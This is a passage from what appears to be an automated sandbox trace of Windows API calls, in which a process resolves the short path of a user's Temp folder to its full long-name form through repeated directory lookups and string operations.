cchCount1=37, lpString2="c:\\", cchCount2=3) returned 3 [0049.438] GetLastError () returned 0x0 [0049.438] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpFindFileData=0x41f340 | out: lpFindFileData=0x41f340*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x50, ftCreationTime.dwHighDateTime=0x41f360, ftLastAccessTime.dwLowDateTime=0x76e44557, ftLastAccessTime.dwHighDateTime=0x4a, ftLastWriteTime.dwLowDateTime=0x6dc08c, ftLastWriteTime.dwHighDateTime=0x41f378, nFileSizeHigh=0x76e44628, nFileSizeLow=0x6dc08c, dwReserved0=0x41f394, dwReserved1=0x4a, cFileName="ŎAP", cAlternateFileName="쀴m삌mJ")) returned 0xffffffff [0049.439] GetLastError () returned 0x2 [0049.439] SysReAllocStringLen (in: pbstr=0x41f314*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x41f314*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 1 [0049.439] SysReAllocStringLen (in: pbstr=0x41f598*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", len=0x24 | out: pbstr=0x41f598*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0049.439] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x41ee24, lpFilePart=0x41ee20 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpFilePart=0x41ee20*="Temp") returned 0x24 [0049.439] SysReAllocStringLen (in: pbstr=0x41f064*=0x0, psz="C:", len=0x2 | out: pbstr=0x41f064*="C:") returned 1 [0049.439] SysReAllocStringLen (in: pbstr=0x41f020*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x41f020*="C:\\") returned 1 [0049.439] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0049.439] SysReAllocStringLen (in: pbstr=0x41f01c*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x41f01c*="C:\\Users\\5P5NRG~1\\AppData\\Local\\") returned 1 [0049.440] CharLowerBuffW (in: lpsz="C:\\Users\\5P5NRG~1\\AppData\\Local\\", cchLength=0x20 | out: lpsz="c:\\users\\5p5nrg~1\\appdata\\local\\") returned 0x20 [0049.440] SetLastError (dwErrCode=0x0) [0049.440] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\5p5nrg~1\\appdata\\local\\", cchCount1=32, lpString2="c:\\", cchCount2=3) returned 3 [0049.440] GetLastError () returned 0x0 [0049.440] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\", lpFindFileData=0x41f088 | out: lpFindFileData=0x41f088*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x50, ftCreationTime.dwHighDateTime=0x41f0a8, ftLastAccessTime.dwLowDateTime=0x76e44557, ftLastAccessTime.dwHighDateTime=0x4a, ftLastWriteTime.dwLowDateTime=0x6dc0e4, ftLastWriteTime.dwHighDateTime=0x41f0c0, nFileSizeHigh=0x76e44628, nFileSizeLow=0x6dc0e4, dwReserved0=0x41f0dc, dwReserved1=0x4a, cFileName="\x15", cAlternateFileName="센m쇬mH")) returned 0xffffffff [0049.440] GetLastError () returned 0x2 [0049.440] SysReAllocStringLen (in: pbstr=0x41f05c*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x41f05c*="C:\\Users\\5P5NRG~1\\AppData\\Local\\") returned 1 [0049.440] SysReAllocStringLen (in: pbstr=0x41f2e0*="C:\\Users\\5P5NRG~1\\AppData\\Local\\", psz="C:\\Users\\5P5NRG~1\\AppData\\Local", len=0x1f | out: pbstr=0x41f2e0*="C:\\Users\\5P5NRG~1\\AppData\\Local") returned 1 [0049.440] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local", nBufferLength=0x104, lpBuffer=0x41eb6c, lpFilePart=0x41eb68 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local", lpFilePart=0x41eb68*="Local") returned 0x1f [0049.440] SysReAllocStringLen (in: pbstr=0x41edac*=0x0, psz="C:", len=0x2 | out: pbstr=0x41edac*="C:") returned 1 [0049.440] SysReAllocStringLen (in: pbstr=0x41ed68*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x41ed68*="C:\\") returned 1 [0049.440] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0049.440] SysReAllocStringLen (in: pbstr=0x41ed64*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\", len=0x1a | out: pbstr=0x41ed64*="C:\\Users\\5P5NRG~1\\AppData\\") returned 1 [0049.440] CharLowerBuffW (in: lpsz="C:\\Users\\5P5NRG~1\\AppData\\", cchLength=0x1a | out: lpsz="c:\\users\\5p5nrg~1\\appdata\\") returned 0x1a [0049.440] SetLastError (dwErrCode=0x0) [0049.440] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\5p5nrg~1\\appdata\\", cchCount1=26, lpString2="c:\\", cchCount2=3) returned 3 [0049.441] GetLastError () returned 0x0 [0049.441] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\", lpFindFileData=0x41edd0 | out: lpFindFileData=0x41edd0*(dwFileAttributes=0x41ede8, ftCreationTime.dwLowDateTime=0x76e443cd, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x15, ftLastAccessTime.dwHighDateTime=0x48, ftLastWriteTime.dwLowDateTime=0x6dc194, ftLastWriteTime.dwHighDateTime=0x41ee08, nFileSizeHigh=0x76e44628, nFileSizeLow=0x6dc194, dwReserved0=0x41ee24, dwReserved1=0x48, cFileName="\x02", cAlternateFileName="쉄m싴m>")) returned 0xffffffff [0049.441] GetLastError () returned 0x2 [0049.441] SysReAllocStringLen (in: pbstr=0x41eda4*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\", len=0x1a | out: pbstr=0x41eda4*="C:\\Users\\5P5NRG~1\\AppData\\") returned 1 [0049.441] SysReAllocStringLen (in: pbstr=0x41f028*="C:\\Users\\5P5NRG~1\\AppData\\", psz="C:\\Users\\5P5NRG~1\\AppData", len=0x19 | out: pbstr=0x41f028*="C:\\Users\\5P5NRG~1\\AppData") returned 1 [0049.441] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData", nBufferLength=0x104, lpBuffer=0x41e8b4, lpFilePart=0x41e8b0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData", lpFilePart=0x41e8b0*="AppData") returned 0x19 [0049.441] SysReAllocStringLen (in: pbstr=0x41eaf4*=0x0, psz="C:", len=0x2 | out: pbstr=0x41eaf4*="C:") returned 1 [0049.441] SysReAllocStringLen (in: pbstr=0x41eab0*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x41eab0*="C:\\") returned 1 [0049.441] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0049.441] SysReAllocStringLen (in: pbstr=0x41eaac*=0x0, psz="C:\\Users\\5P5NRG~1\\", len=0x12 | out: pbstr=0x41eaac*="C:\\Users\\5P5NRG~1\\") returned 1 [0049.441] CharLowerBuffW (in: lpsz="C:\\Users\\5P5NRG~1\\", cchLength=0x12 | out: lpsz="c:\\users\\5p5nrg~1\\") returned 0x12 [0049.441] SetLastError (dwErrCode=0x0) [0049.441] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\5p5nrg~1\\", cchCount1=18, lpString2="c:\\", cchCount2=3) returned 3 [0049.441] GetLastError () returned 0x0 [0049.442] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\", lpFindFileData=0x41eb18 | out: lpFindFileData=0x41eb18*(dwFileAttributes=0x41eca4, ftCreationTime.dwLowDateTime=0x77cb1ecd, ftCreationTime.dwHighDateTime=0x135aae, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77c6e36c, ftLastWriteTime.dwLowDateTime=0x77c6e0d2, ftLastWriteTime.dwHighDateTime=0x6c0000, nFileSizeHigh=0x40, nFileSizeLow=0x6d52e0, dwReserved0=0x41eb6c, dwReserved1=0x3e, cFileName="\x02", cAlternateFileName="叄m卼m2")) returned 0xffffffff [0049.442] GetLastError () returned 0x2 [0049.442] SysReAllocStringLen (in: pbstr=0x41eaec*=0x0, psz="C:\\Users\\5P5NRG~1\\", len=0x12 | out: pbstr=0x41eaec*="C:\\Users\\5P5NRG~1\\") returned 1 [0049.442] SysReAllocStringLen (in: pbstr=0x41ed70*="C:\\Users\\5P5NRG~1\\", psz="C:\\Users\\5P5NRG~1", len=0x11 | out: pbstr=0x41ed70*="C:\\Users\\5P5NRG~1") returned 1 [0049.442] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1", nBufferLength=0x104, lpBuffer=0x41e5fc, lpFilePart=0x41e5f8 | out: lpBuffer="C:\\Users\\5P5NRG~1", lpFilePart=0x41e5f8*="5P5NRG~1") returned 0x11 [0049.442] SysReAllocStringLen (in: pbstr=0x41e83c*=0x0, psz="C:", len=0x2 | out: pbstr=0x41e83c*="C:") returned 1 [0049.442] SysReAllocStringLen (in: pbstr=0x41e7f8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x41e7f8*="C:\\") returned 1 [0049.442] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0049.442] SysReAllocStringLen (in: pbstr=0x41e7f4*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x41e7f4*="C:\\Users\\") returned 1 [0049.442] CharLowerBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="c:\\users\\") returned 0x9 [0049.442] SetLastError (dwErrCode=0x0) [0049.442] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\", cchCount1=9, lpString2="c:\\", cchCount2=3) returned 3 [0049.442] GetLastError () returned 0x0 [0049.442] FindFirstFileW (in: lpFileName="C:\\Users\\", lpFindFileData=0x41e860 | out: lpFindFileData=0x41e860*(dwFileAttributes=0x41e9ec, ftCreationTime.dwLowDateTime=0x77cb1ecd, ftCreationTime.dwHighDateTime=0x135aae, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77c6e36c, ftLastWriteTime.dwLowDateTime=0x77c6e0d2, ftLastWriteTime.dwHighDateTime=0x6c0000, nFileSizeHigh=0x30, nFileSizeLow=0x6dabe0, dwReserved0=0x41e8b4, dwReserved1=0x32, cFileName="\x02", cAlternateFileName="겔m갤m\"")) returned 0xffffffff [0049.443] GetLastError () returned 0x2 [0049.443] SysReAllocStringLen (in: pbstr=0x41e834*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x41e834*="C:\\Users\\") returned 1 [0049.443] SysReAllocStringLen (in: pbstr=0x41eab8*="C:\\Users\\", psz="C:\\Users", len=0x8 | out: pbstr=0x41eab8*="C:\\Users") returned 1 [0049.443] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x104, lpBuffer=0x41e344, lpFilePart=0x41e340 | out: lpBuffer="C:\\Users", lpFilePart=0x41e340*="Users") returned 0x8 [0049.443] SysReAllocStringLen (in: pbstr=0x41e584*=0x0, psz="C:", len=0x2 | out: pbstr=0x41e584*="C:") returned 1 [0049.443] SysReAllocStringLen (in: pbstr=0x41e540*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x41e540*="C:\\") returned 1 [0049.443] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0049.443] SysReAllocStringLen (in: pbstr=0x41e53c*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x41e53c*="C:\\") returned 1 [0049.443] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0049.443] SetLastError (dwErrCode=0x0) [0049.443] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\", cchCount1=3, lpString2="c:\\", cchCount2=3) returned 2 [0049.443] GetLastError () returned 0x0 [0049.443] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x41e5a8 | out: lpFindFileData=0x41e5a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x77c73ca3, cFileName="Users", cAlternateFileName="")) returned 0x6dc748 [0049.444] FileTimeToLocalFileTime (in: lpFileTime=0x41e5bc, lpLocalFileTime=0x41e52c | out: lpLocalFileTime=0x41e52c) returned 1 [0049.444] FileTimeToDosDateTime (in: lpFileTime=0x41e52c, lpFatDate=0x41e58a, lpFatTime=0x41e588 | out: lpFatDate=0x41e58a, lpFatTime=0x41e588) returned 1 [0049.444] FindClose (in: hFindFile=0x6dc748 | out: hFindFile=0x6dc748) returned 1 [0049.444] SysReAllocStringLen (in: pbstr=0x41eab8*="C:\\Users", psz="C:\\Users", len=0x8 | out: pbstr=0x41eab8*="C:\\Users") returned 1 [0049.444] SysReAllocStringLen (in: pbstr=0x41e82c*=0x0, psz="C:\\Users", len=0x8 | out: pbstr=0x41e82c*="C:\\Users") returned 1 [0049.444] SysReAllocStringLen (in: pbstr=0x41eab8*="C:\\Users", psz="C:\\Users\\", len=0x9 | out: pbstr=0x41eab8*="C:\\Users\\") returned 1 [0049.444] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1", lpFindFileData=0x41e860 | out: lpFindFileData=0x41e860*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41e8b4, dwReserved1=0x32, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6dc748 [0049.444] FileTimeToLocalFileTime (in: lpFileTime=0x41e874, lpLocalFileTime=0x41e7e4 | out: lpLocalFileTime=0x41e7e4) returned 1 [0049.444] FileTimeToDosDateTime (in: lpFileTime=0x41e7e4, lpFatDate=0x41e842, lpFatTime=0x41e840 | out: lpFatDate=0x41e842, lpFatTime=0x41e840) returned 1 [0049.445] FindClose (in: hFindFile=0x6dc748 | out: hFindFile=0x6dc748) returned 1 [0049.445] SysReAllocStringLen (in: pbstr=0x41ed70*="C:\\Users\\5P5NRG~1", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz", len=0x1d | out: pbstr=0x41ed70*="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 1 [0049.445] SysReAllocStringLen (in: pbstr=0x41eae4*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz", len=0x1d | out: pbstr=0x41eae4*="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 1 [0049.445] SysReAllocStringLen (in: pbstr=0x41ed70*="C:\\Users\\5p5NrGJn0jS HALPmcxz", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", len=0x1e | out: pbstr=0x41ed70*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 1 [0049.445] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFindFileData=0x41eb18 | out: lpFindFileData=0x41eb18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41eb6c, dwReserved1=0x3e, cFileName="AppData", cAlternateFileName="")) returned 0x6dc850 [0049.445] FileTimeToLocalFileTime (in: lpFileTime=0x41eb2c, lpLocalFileTime=0x41ea9c | out: lpLocalFileTime=0x41ea9c) returned 1 [0049.445] FileTimeToDosDateTime (in: lpFileTime=0x41ea9c, lpFatDate=0x41eafa, lpFatTime=0x41eaf8 | out: lpFatDate=0x41eafa, lpFatTime=0x41eaf8) returned 1 [0049.445] FindClose (in: hFindFile=0x6dc850 | out: hFindFile=0x6dc850) returned 1 [0049.445] SysReAllocStringLen (in: pbstr=0x41f028*="C:\\Users\\5P5NRG~1\\AppData", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", len=0x25 | out: pbstr=0x41f028*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned 1 [0049.446] SysReAllocStringLen (in: pbstr=0x41ed9c*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", len=0x25 | out: pbstr=0x41ed9c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned 1 [0049.446] SysReAllocStringLen (in: pbstr=0x41f028*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", len=0x26 | out: pbstr=0x41f028*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned 1 [0049.446] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFindFileData=0x41edd0 | out: lpFindFileData=0x41edd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41ee24, dwReserved1=0x48, cFileName="Local", cAlternateFileName="")) returned 0x6dc850 [0049.446] FileTimeToLocalFileTime (in: lpFileTime=0x41ede4, lpLocalFileTime=0x41ed54 | out: lpLocalFileTime=0x41ed54) returned 1 [0049.446] FileTimeToDosDateTime (in: lpFileTime=0x41ed54, lpFatDate=0x41edb2, lpFatTime=0x41edb0 | out: lpFatDate=0x41edb2, lpFatTime=0x41edb0) returned 1 [0049.446] FindClose (in: hFindFile=0x6dc850 | out: hFindFile=0x6dc850) returned 1 [0049.446] SysReAllocStringLen (in: pbstr=0x41f2e0*="C:\\Users\\5P5NRG~1\\AppData\\Local", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", len=0x2b | out: pbstr=0x41f2e0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0049.446] SysReAllocStringLen (in: pbstr=0x41f054*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", len=0x2b | out: pbstr=0x41f054*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0049.446] SysReAllocStringLen (in: pbstr=0x41f2e0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", len=0x2c | out: pbstr=0x41f2e0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\") returned 1 [0049.446] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp", lpFindFileData=0x41f088 | out: lpFindFileData=0x41f088*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0dcfaa0, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xd0dcfaa0, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41f0dc, dwReserved1=0x4a, cFileName="Temp", cAlternateFileName="")) returned 0x6dc240 [0049.447] FileTimeToLocalFileTime (in: lpFileTime=0x41f09c, lpLocalFileTime=0x41f00c | out: lpLocalFileTime=0x41f00c) returned 1 [0049.447] FileTimeToDosDateTime (in: lpFileTime=0x41f00c, lpFatDate=0x41f06a, lpFatTime=0x41f068 | out: lpFatDate=0x41f06a, lpFatTime=0x41f068) returned 1 [0049.447] FindClose (in: hFindFile=0x6dc240 | out: hFindFile=0x6dc240) returned 1 [0049.447] SysReAllocStringLen (in: pbstr=0x41f598*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp", len=0x30 | out: pbstr=0x41f598*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp") returned 1 [0049.447] SysReAllocStringLen (in: pbstr=0x41f30c*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp", len=0x30 | out: pbstr=0x41f30c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp") returned 1 [0049.447] SysReAllocStringLen (in: pbstr=0x41f598*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", len=0x31 | out: pbstr=0x41f598*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\") returned 1 [0049.447] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", lpFindFileData=0x41f340 | out: lpFindFileData=0x41f340*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x50, ftCreationTime.dwHighDateTime=0x41f360, ftLastAccessTime.dwLowDateTime=0x76e44557, ftLastAccessTime.dwHighDateTime=0x4a, ftLastWriteTime.dwLowDateTime=0x6dc08c, ftLastWriteTime.dwHighDateTime=0x41f378, nFileSizeHigh=0x76e44628, nFileSizeLow=0x6dc08c, dwReserved0=0x41f394, dwReserved1=0x4a, cFileName="ŎAP", cAlternateFileName="쀴m삌mJ")) returned 0xffffffff [0049.447] GetLastError () returned 0x2 [0049.447] SysReAllocStringLen (in: pbstr=0x41f6ac*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x41f6ac*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 1 [0049.448] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp")) returned 0x2010 [0049.448] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x41f0dc, lpFilePart=0x41f0d8 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpFilePart=0x41f0d8*="Temp") returned 0x24 [0049.448] SysReAllocStringLen (in: pbstr=0x41f31c*=0x0, psz="C:", len=0x2 | out: pbstr=0x41f31c*="C:") returned 1 [0049.448] SysReAllocStringLen (in: pbstr=0x41f2d8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x41f2d8*="C:\\") returned 1 [0049.448] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0049.448] SysReAllocStringLen (in: pbstr=0x41f2d4*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x41f2d4*="C:\\Users\\5P5NRG~1\\AppData\\Local\\") returned 1 [0049.448] CharLowerBuffW (in: lpsz="C:\\Users\\5P5NRG~1\\AppData\\Local\\", cchLength=0x20 | out: lpsz="c:\\users\\5p5nrg~1\\appdata\\local\\") returned 0x20 [0049.448] SetLastError (dwErrCode=0x0) [0049.448] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\5p5nrg~1\\appdata\\local\\", cchCount1=32, lpString2="c:\\", cchCount2=3) returned 3 [0049.448] GetLastError () returned 0x0 [0049.449] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\", lpFindFileData=0x41f340 | out: lpFindFileData=0x41f340*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0049.449] GetLastError () returned 0x2 [0049.449] SysReAllocStringLen (in: pbstr=0x41f314*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x41f314*="C:\\Users\\5P5NRG~1\\AppData\\Local\\") returned 1 [0049.449] SysReAllocStringLen (in: pbstr=0x41f598*="C:\\Users\\5P5NRG~1\\AppData\\Local\\", psz="C:\\Users\\5P5NRG~1\\AppData\\Local", len=0x1f | out: pbstr=0x41f598*="C:\\Users\\5P5NRG~1\\AppData\\Local") returned 1 [0049.449] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local", nBufferLength=0x104, lpBuffer=0x41ee24, lpFilePart=0x41ee20 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local", lpFilePart=0x41ee20*="Local") returned 0x1f [0049.449] SysReAllocStringLen (in: pbstr=0x41f064*=0x0, psz="C:", len=0x2 | out: pbstr=0x41f064*="C:") returned 1 [0049.449] SysReAllocStringLen (in: pbstr=0x41f020*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x41f020*="C:\\") returned 1 [0049.449] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0049.449] SysReAllocStringLen (in: pbstr=0x41f01c*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\", len=0x1a | out: pbstr=0x41f01c*="C:\\Users\\5P5NRG~1\\AppData\\") returned 1 [0049.449] CharLowerBuffW (in: lpsz="C:\\Users\\5P5NRG~1\\AppData\\", cchLength=0x1a | out: lpsz="c:\\users\\5p5nrg~1\\appdata\\") returned 0x1a [0049.449] SetLastError (dwErrCode=0x0) [0049.449] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\5p5nrg~1\\appdata\\", cchCount1=26, lpString2="c:\\", cchCount2=3) returned 3 [0049.450] GetLastError () returned 0x0 [0049.450] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\", lpFindFileData=0x41f088 | out: lpFindFileData=0x41f088*(dwFileAttributes=0x41f0a0, ftCreationTime.dwLowDateTime=0x76e443cd, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x15, ftLastAccessTime.dwHighDateTime=0x48, ftLastWriteTime.dwLowDateTime=0x6dc864, ftLastWriteTime.dwHighDateTime=0x41f0c0, nFileSizeHigh=0x76e44628, nFileSizeLow=0x6dc864, dwReserved0=0x41f0dc, dwReserved1=0x48, cFileName="\x15", cAlternateFileName="쫤m쟼m>")) returned 0xffffffff [0049.450] GetLastError () returned 0x2 [0049.450] SysReAllocStringLen (in: pbstr=0x41f05c*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\", len=0x1a | out: pbstr=0x41f05c*="C:\\Users\\5P5NRG~1\\AppData\\") returned 1 [0049.450] SysReAllocStringLen (in: pbstr=0x41f2e0*="C:\\Users\\5P5NRG~1\\AppData\\", psz="C:\\Users\\5P5NRG~1\\AppData", len=0x19 | out: pbstr=0x41f2e0*="C:\\Users\\5P5NRG~1\\AppData") returned 1 [0049.450] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData", nBufferLength=0x104, lpBuffer=0x41eb6c, lpFilePart=0x41eb68 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData", lpFilePart=0x41eb68*="AppData") returned 0x19 [0049.450] SysReAllocStringLen (in: pbstr=0x41edac*=0x0, psz="C:", len=0x2 | out: pbstr=0x41edac*="C:") returned 1 [0049.450] SysReAllocStringLen (in: pbstr=0x41ed68*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x41ed68*="C:\\") returned 1 [0049.450] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0049.450] SysReAllocStringLen (in: pbstr=0x41ed64*=0x0, psz="C:\\Users\\5P5NRG~1\\", len=0x12 | out: pbstr=0x41ed64*="C:\\Users\\5P5NRG~1\\") returned 1 [0049.450] CharLowerBuffW (in: lpsz="C:\\Users\\5P5NRG~1\\", cchLength=0x12 | out: 